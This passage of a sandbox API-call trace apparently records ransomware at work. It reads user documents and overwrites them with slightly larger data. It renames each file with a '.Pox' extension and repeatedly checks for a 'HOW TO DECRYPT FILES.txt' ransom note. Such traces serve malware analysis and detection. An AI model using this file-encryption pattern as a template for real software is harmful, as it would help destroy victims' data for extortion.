HALPmcxz\\Desktop\\HOW TO DECRYPT FILES.txt", nBufferLength=0x105, lpBuffer=0x3ae0dc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HOW TO DECRYPT FILES.txt", lpFilePart=0x0) returned 0x3e [0038.906] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae53c) returned 1 [0038.907] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HOW TO DECRYPT FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\how to decrypt files.txt"), fInfoLevelId=0x0, lpFileInformation=0x3ae5b8 | out: lpFileInformation=0x3ae5b8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0038.907] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae538) returned 1 [0038.907] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\c-OUqwNcpwZKsqZUKU.docx", nBufferLength=0x105, lpBuffer=0x3adfb4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\c-OUqwNcpwZKsqZUKU.docx", lpFilePart=0x0) returned 0x3f [0038.907] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae4a8) returned 1 [0038.907] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\c-OUqwNcpwZKsqZUKU.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\c-ouqwncpwzksqzuku.docx"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x26c [0038.908] GetFileType (hFile=0x26c) returned 0x1 [0038.908] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae4a4) returned 1 [0038.908] GetFileType (hFile=0x26c) returned 0x1 [0038.908] WriteFile (in: hFile=0x26c, lpBuffer=0x241143c*, nNumberOfBytesToWrite=0xd090, lpNumberOfBytesWritten=0x3ae564, lpOverlapped=0x0 | out: lpBuffer=0x241143c*, lpNumberOfBytesWritten=0x3ae564*=0xd090, lpOverlapped=0x0) returned 1 [0038.910] CloseHandle (hObject=0x26c) returned 1 [0038.911] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\c-OUqwNcpwZKsqZUKU.docx", nBufferLength=0x105, lpBuffer=0x3ae0e8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\c-OUqwNcpwZKsqZUKU.docx", lpFilePart=0x0) returned 0x3f [0038.911] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\c-OUqwNcpwZKsqZUKU.docx.Pox", nBufferLength=0x105, lpBuffer=0x3ae0e8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\c-OUqwNcpwZKsqZUKU.docx.Pox", lpFilePart=0x0) returned 0x43 [0038.911] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae548) returned 1 [0038.911] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\c-OUqwNcpwZKsqZUKU.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\c-ouqwncpwzksqzuku.docx"), fInfoLevelId=0x0, lpFileInformation=0x3ae5c4 | out: lpFileInformation=0x3ae5c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4ca6de50, ftCreationTime.dwHighDateTime=0x1d4cdc6, ftLastAccessTime.dwLowDateTime=0x522ef980, ftLastAccessTime.dwHighDateTime=0x1d4b213, ftLastWriteTime.dwLowDateTime=0x29615680, ftLastWriteTime.dwHighDateTime=0x1d53803, nFileSizeHigh=0x0, nFileSizeLow=0xd090)) returned 1 [0038.911] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae544) returned 1 [0038.911] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\c-OUqwNcpwZKsqZUKU.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\c-ouqwncpwzksqzuku.docx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\c-OUqwNcpwZKsqZUKU.docx.Pox" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\c-ouqwncpwzksqzuku.docx.pox")) returned 1 [0038.912] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CcxLxbYA5PVQheLVcI.ppt", nBufferLength=0x105, lpBuffer=0x3adfc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CcxLxbYA5PVQheLVcI.ppt", lpFilePart=0x0) returned 0x3e [0038.912] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae4bc) returned 1 [0038.912] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CcxLxbYA5PVQheLVcI.ppt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ccxlxbya5pvqhelvci.ppt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x26c [0038.912] GetFileType (hFile=0x26c) returned 0x1 [0038.912] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae4b8) returned 1 [0038.912] GetFileType (hFile=0x26c) returned 0x1 [0038.912] GetFileSize (in: hFile=0x26c, lpFileSizeHigh=0x3ae5c4 | out: lpFileSizeHigh=0x3ae5c4*=0x0) returned 0x70fc [0038.912] ReadFile (in: hFile=0x26c, lpBuffer=0x241ea88, nNumberOfBytesToRead=0x70fc, lpNumberOfBytesRead=0x3ae570, lpOverlapped=0x0 | out: lpBuffer=0x241ea88*, lpNumberOfBytesRead=0x3ae570*=0x70fc, lpOverlapped=0x0) returned 1 [0038.913] CloseHandle (hObject=0x26c) returned 1 [0038.928] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HOW TO DECRYPT FILES.txt", nBufferLength=0x105, lpBuffer=0x3ae0dc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HOW TO DECRYPT FILES.txt", lpFilePart=0x0) returned 0x3e [0038.929] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae53c) returned 1 [0038.929] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HOW TO DECRYPT FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\how to decrypt files.txt"), fInfoLevelId=0x0, lpFileInformation=0x3ae5b8 | out: lpFileInformation=0x3ae5b8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0038.929] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae538) returned 1 [0038.929] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CcxLxbYA5PVQheLVcI.ppt", nBufferLength=0x105, lpBuffer=0x3adfb4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CcxLxbYA5PVQheLVcI.ppt", lpFilePart=0x0) returned 0x3e [0038.929] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae4a8) returned 1 [0038.929] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CcxLxbYA5PVQheLVcI.ppt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ccxlxbya5pvqhelvci.ppt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x26c [0038.930] GetFileType (hFile=0x26c) returned 0x1 [0038.930] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae4a4) returned 1 [0038.930] GetFileType (hFile=0x26c) returned 0x1 [0038.930] WriteFile (in: hFile=0x26c, lpBuffer=0x248eecc*, nNumberOfBytesToWrite=0x7100, lpNumberOfBytesWritten=0x3ae564, lpOverlapped=0x0 | out: lpBuffer=0x248eecc*, lpNumberOfBytesWritten=0x3ae564*=0x7100, lpOverlapped=0x0) returned 1 [0038.931] CloseHandle (hObject=0x26c) returned 1 [0038.932] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CcxLxbYA5PVQheLVcI.ppt", nBufferLength=0x105, lpBuffer=0x3ae0e8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CcxLxbYA5PVQheLVcI.ppt", lpFilePart=0x0) returned 0x3e [0038.932] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CcxLxbYA5PVQheLVcI.ppt.Pox", nBufferLength=0x105, lpBuffer=0x3ae0e8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CcxLxbYA5PVQheLVcI.ppt.Pox", lpFilePart=0x0) returned 0x42 [0038.932] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae548) returned 1 [0038.932] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CcxLxbYA5PVQheLVcI.ppt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ccxlxbya5pvqhelvci.ppt"), fInfoLevelId=0x0, lpFileInformation=0x3ae5c4 | out: lpFileInformation=0x3ae5c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc7702460, ftCreationTime.dwHighDateTime=0x1d4d27c, ftLastAccessTime.dwLowDateTime=0xf59aa830, ftLastAccessTime.dwHighDateTime=0x1d4c9c9, ftLastWriteTime.dwLowDateTime=0x2963b7e0, ftLastWriteTime.dwHighDateTime=0x1d53803, nFileSizeHigh=0x0, nFileSizeLow=0x7100)) returned 1 [0038.932] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae544) returned 1 [0038.932] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CcxLxbYA5PVQheLVcI.ppt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ccxlxbya5pvqhelvci.ppt"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CcxLxbYA5PVQheLVcI.ppt.Pox" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ccxlxbya5pvqhelvci.ppt.pox")) returned 1 [0038.933] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\DihjpK.docx", nBufferLength=0x105, lpBuffer=0x3adfc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\DihjpK.docx", lpFilePart=0x0) returned 0x33 [0038.933] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae4bc) returned 1 [0038.933] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\DihjpK.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\dihjpk.docx"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x26c [0038.933] GetFileType (hFile=0x26c) returned 0x1 [0038.933] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae4b8) returned 1 [0038.933] GetFileType (hFile=0x26c) returned 0x1 [0038.933] GetFileSize (in: hFile=0x26c, lpFileSizeHigh=0x3ae5c4 | out: lpFileSizeHigh=0x3ae5c4*=0x0) returned 0x3eff [0038.933] ReadFile (in: hFile=0x26c, lpBuffer=0x2496570, nNumberOfBytesToRead=0x3eff, lpNumberOfBytesRead=0x3ae570, lpOverlapped=0x0 | out: lpBuffer=0x2496570*, lpNumberOfBytesRead=0x3ae570*=0x3eff, lpOverlapped=0x0) returned 1 [0038.934] CloseHandle (hObject=0x26c) returned 1 [0038.948] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HOW TO DECRYPT FILES.txt", nBufferLength=0x105, lpBuffer=0x3ae0dc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HOW TO DECRYPT FILES.txt", lpFilePart=0x0) returned 0x3e [0038.948] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae53c) returned 1 [0038.948] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HOW TO DECRYPT FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\how to decrypt files.txt"), fInfoLevelId=0x0, lpFileInformation=0x3ae5b8 | out: lpFileInformation=0x3ae5b8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0038.949] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae538) returned 1 [0038.949] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\DihjpK.docx", nBufferLength=0x105, lpBuffer=0x3adfb4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\DihjpK.docx", lpFilePart=0x0) returned 0x33 [0038.949] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae4a8) returned 1 [0038.949] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\DihjpK.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\dihjpk.docx"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x26c [0038.950] GetFileType (hFile=0x26c) returned 0x1 [0038.950] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae4a4) returned 1 [0038.950] GetFileType (hFile=0x26c) returned 0x1 [0038.950] WriteFile (in: hFile=0x26c, lpBuffer=0x24f6e5c*, nNumberOfBytesToWrite=0x3f00, lpNumberOfBytesWritten=0x3ae564, lpOverlapped=0x0 | out: lpBuffer=0x24f6e5c*, lpNumberOfBytesWritten=0x3ae564*=0x3f00, lpOverlapped=0x0) returned 1 [0038.951] CloseHandle (hObject=0x26c) returned 1 [0038.951] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\DihjpK.docx", nBufferLength=0x105, lpBuffer=0x3ae0e8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\DihjpK.docx", lpFilePart=0x0) returned 0x33 [0038.952] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\DihjpK.docx.Pox", nBufferLength=0x105, lpBuffer=0x3ae0e8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\DihjpK.docx.Pox", lpFilePart=0x0) returned 0x37 [0038.952] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae548) returned 1 [0038.952] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\DihjpK.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\dihjpk.docx"), fInfoLevelId=0x0, lpFileInformation=0x3ae5c4 | out: lpFileInformation=0x3ae5c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3a569030, ftCreationTime.dwHighDateTime=0x1d5041a, ftLastAccessTime.dwLowDateTime=0x759d1ed0, ftLastAccessTime.dwHighDateTime=0x1d4e551, ftLastWriteTime.dwLowDateTime=0x29661940, ftLastWriteTime.dwHighDateTime=0x1d53803, nFileSizeHigh=0x0, nFileSizeLow=0x3f00)) returned 1 [0038.952] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae544) returned 1 [0038.952] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\DihjpK.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\dihjpk.docx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\DihjpK.docx.Pox" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\dihjpk.docx.pox")) returned 1 [0038.953] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Dkou zZ n2_BH1.xlsx", nBufferLength=0x105, lpBuffer=0x3adfc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Dkou zZ n2_BH1.xlsx", lpFilePart=0x0) returned 0x3b [0038.953] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae4bc) returned 1 [0038.953] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Dkou zZ n2_BH1.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\dkou zz n2_bh1.xlsx"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x26c [0038.953] GetFileType (hFile=0x26c) returned 0x1 [0038.953] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae4b8) returned 1 [0038.953] GetFileType (hFile=0x26c) returned 0x1 [0038.953] GetFileSize (in: hFile=0x26c, lpFileSizeHigh=0x3ae5c4 | out: lpFileSizeHigh=0x3ae5c4*=0x0) returned 0x13f35 [0038.953] ReadFile (in: hFile=0x26c, lpBuffer=0x24fb290, nNumberOfBytesToRead=0x13f35, lpNumberOfBytesRead=0x3ae570, lpOverlapped=0x0 | out: lpBuffer=0x24fb290*, lpNumberOfBytesRead=0x3ae570*=0x13f35, lpOverlapped=0x0) returned 1 [0038.954] CloseHandle (hObject=0x26c) returned 1 [0038.971] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HOW TO DECRYPT FILES.txt", nBufferLength=0x105, lpBuffer=0x3ae0dc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HOW TO DECRYPT FILES.txt", lpFilePart=0x0) returned 0x3e [0038.971] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae53c) returned 1 [0038.971] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HOW TO DECRYPT FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\how to decrypt files.txt"), fInfoLevelId=0x0, lpFileInformation=0x3ae5b8 | out: lpFileInformation=0x3ae5b8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0038.971] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae538) returned 1 [0038.971] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Dkou zZ n2_BH1.xlsx", nBufferLength=0x105, lpBuffer=0x3adfb4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Dkou zZ n2_BH1.xlsx", lpFilePart=0x0) returned 0x3b [0038.971] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae4a8) returned 1 [0038.971] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Dkou zZ n2_BH1.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\dkou zz n2_bh1.xlsx"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x26c [0038.973] GetFileType (hFile=0x26c) returned 0x1 [0038.973] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae4a4) returned 1 [0038.973] GetFileType (hFile=0x26c) returned 0x1 [0038.973] WriteFile (in: hFile=0x26c, lpBuffer=0x2583e50*, nNumberOfBytesToWrite=0x13f40, lpNumberOfBytesWritten=0x3ae564, lpOverlapped=0x0 | out: lpBuffer=0x2583e50*, lpNumberOfBytesWritten=0x3ae564*=0x13f40, lpOverlapped=0x0) returned 1 [0038.975] CloseHandle (hObject=0x26c) returned 1 [0038.976] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Dkou zZ n2_BH1.xlsx", nBufferLength=0x105, lpBuffer=0x3ae0e8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Dkou zZ n2_BH1.xlsx", lpFilePart=0x0) returned 0x3b [0038.977] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Dkou zZ n2_BH1.xlsx.Pox", nBufferLength=0x105, lpBuffer=0x3ae0e8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Dkou zZ n2_BH1.xlsx.Pox", lpFilePart=0x0) returned 0x3f [0038.977] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae548) returned 1 [0038.977] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Dkou zZ n2_BH1.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\dkou zz n2_bh1.xlsx"), fInfoLevelId=0x0, lpFileInformation=0x3ae5c4 | out: lpFileInformation=0x3ae5c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x93b0a350, ftCreationTime.dwHighDateTime=0x1d52625, ftLastAccessTime.dwLowDateTime=0x75119b20, ftLastAccessTime.dwHighDateTime=0x1d50c76, ftLastWriteTime.dwLowDateTime=0x296adc00, ftLastWriteTime.dwHighDateTime=0x1d53803, nFileSizeHigh=0x0, nFileSizeLow=0x13f40)) returned 1 [0038.977] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae544) returned 1 [0038.977] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Dkou zZ n2_BH1.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\dkou zz n2_bh1.xlsx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Dkou zZ n2_BH1.xlsx.Pox" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\dkou zz n2_bh1.xlsx.pox")) returned 1 [0038.977] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\fKdo0m3dDNNLylacs0H.xlsx", nBufferLength=0x105, lpBuffer=0x3adfc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\fKdo0m3dDNNLylacs0H.xlsx", lpFilePart=0x0) returned 0x40 [0038.977] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae4bc) returned 1 [0038.977] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\fKdo0m3dDNNLylacs0H.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\fkdo0m3ddnnlylacs0h.xlsx"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x26c [0038.978] GetFileType (hFile=0x26c) returned 0x1 [0038.978] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae4b8) returned 1 [0038.978] GetFileType (hFile=0x26c) returned 0x1 [0038.978] GetFileSize (in: hFile=0x26c, lpFileSizeHigh=0x3ae5c4 | out: lpFileSizeHigh=0x3ae5c4*=0x0) returned 0x16c36 [0038.978] ReadFile (in: hFile=0x26c, lpBuffer=0x35ccc68, nNumberOfBytesToRead=0x16c36, lpNumberOfBytesRead=0x3ae570, lpOverlapped=0x0 | out: lpBuffer=0x35ccc68*, lpNumberOfBytesRead=0x3ae570*=0x16c36, lpOverlapped=0x0) returned 1 [0038.979] CloseHandle (hObject=0x26c) returned 1 [0039.032] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HOW TO DECRYPT FILES.txt", nBufferLength=0x105, lpBuffer=0x3ae0dc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HOW TO DECRYPT FILES.txt", lpFilePart=0x0) returned 0x3e [0039.032] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae53c) returned 1 [0039.032] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HOW TO DECRYPT FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\how to decrypt files.txt"), fInfoLevelId=0x0, lpFileInformation=0x3ae5b8 | out: lpFileInformation=0x3ae5b8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0039.032] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae538) returned 1 [0039.032] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\fKdo0m3dDNNLylacs0H.xlsx", nBufferLength=0x105, lpBuffer=0x3adfb4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\fKdo0m3dDNNLylacs0H.xlsx", lpFilePart=0x0) returned 0x40 [0039.032] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae4a8) returned 1 [0039.032] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\fKdo0m3dDNNLylacs0H.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\fkdo0m3ddnnlylacs0h.xlsx"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x26c [0039.033] GetFileType (hFile=0x26c) returned 0x1 [0039.033] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae4a4) returned 1 [0039.033] GetFileType (hFile=0x26c) returned 0x1 [0039.034] WriteFile (in: hFile=0x26c, lpBuffer=0x363e9e0*, nNumberOfBytesToWrite=0x16c40, lpNumberOfBytesWritten=0x3ae564, lpOverlapped=0x0 | out: lpBuffer=0x363e9e0*, lpNumberOfBytesWritten=0x3ae564*=0x16c40, lpOverlapped=0x0) returned 1 [0039.036] CloseHandle (hObject=0x26c) returned 1 [0039.037] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\fKdo0m3dDNNLylacs0H.xlsx", nBufferLength=0x105, lpBuffer=0x3ae0e8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\fKdo0m3dDNNLylacs0H.xlsx", lpFilePart=0x0) returned 0x40 [0039.037] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\fKdo0m3dDNNLylacs0H.xlsx.Pox", nBufferLength=0x105, lpBuffer=0x3ae0e8, lpFilePart=0x0 | out: 